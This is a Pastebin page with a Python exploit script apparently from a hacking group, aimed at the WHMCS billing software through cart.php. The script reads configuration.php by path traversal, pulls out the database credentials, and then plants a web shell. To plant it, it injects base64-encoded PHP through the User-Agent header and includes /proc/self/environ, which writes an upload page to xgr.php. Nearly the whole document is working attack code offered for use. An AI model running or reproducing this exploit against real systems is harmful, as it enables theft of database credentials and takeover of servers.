Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Author: parkdream1
- # Messenger: h3x4r
- # (c) R00TW0RM - Private Community
- # https://r00tw0rm.com/
- # WHMCS killer via cart.php
- # http://www.exploit-db.com/exploits/17999/
- # Shell upload via /proc/self/environ
- # Greets: To all members of r00tw0rm !!
- import socket,sys,re
- def main():
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
- r.send("GET /"+path+"/cart.php?a=h3x4r&templatefile=../../../configuration.php%00 HTTP/1.0\r\n")
- r.send("Host: "+target+"\r\n\r\n")
- print "[*] Send Request Success"
- page = r.recv(1024)
- fullpage = ""
- while len(page):
- fullpage = fullpage + page
- page = r.recv(1024)
- r.close()
- except Exception, e:
- print "[-] Cant Not Send Request"
- print e
- sys.exit(1)
- db_host = re.search("db_host =(.*);",fullpage)
- db_username = re.search("db_username =(.*);",fullpage)
- db_password = re.search("db_password =(.*);",fullpage)
- db_name =re.search("db_name =(.*);",fullpage)
- if db_host:
- print "[*] Website "+target+" is vulnerability"
- print "[*] Information Database"
- print "Host: %s" % (db_host.group(1))
- print "User: %s" % (db_username.group(1))
- print "Pass: %s" % (db_password.group(1))
- print "Db Name: %s" % (db_name.group(1))
- hoi()
- else:
- print "[-] Website "+target+" is not vulnerability"
- sys.exit(1)
- def hoi():
- hoi = raw_input("[*] You want upload shell:\nType yes To Starting: ")
- if hoi == "yes":
- upshell()
- else:
- sys.exit(1)
- def upshell():
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
- r.send("GET /"+path+"/cart.php?a=h3x4r&templatefile=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0\r\n")
- r.send("User-Agent: {php}eval(base64_decode(' JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ3hnci5waHAnLCd3Jyk7DQpmd3JpdGUoJGZpY2hpZXIsICRjKTsNCmZjbG9zZSgkZmljaGllcik7'));exit;{/php}\r\n")
- r.send("Host: "+target+"\r\n\r\n")
- print "[*] Ok"
- print "[*] Please Check "+target+"/xgr.php"
- except Exception, e:
- print "[-] Up Shell false"
- print e
- sys.exit(1)
- def banner():
- print "\n"
- print "****************************************************************************"
- print "|| WHMCS Killer v. 1.0 ||"
- print "|| by parkdream1 ||"
- print "|| (c) R00TW0RM - Private Community ||"
- print "|| Fucking from " + target + " on port " + str(port) + " ||"
- print "****************************************************************************"
- print "\n"
- if __name__ == '__main__':
- if len(sys.argv) != 4:
- print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
- print "Example: python", sys.argv[0], "boxvps.com 80 client"
- sys.exit(1)
- target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
- banner()
- main()
Add Comment
Please, Sign In to add comment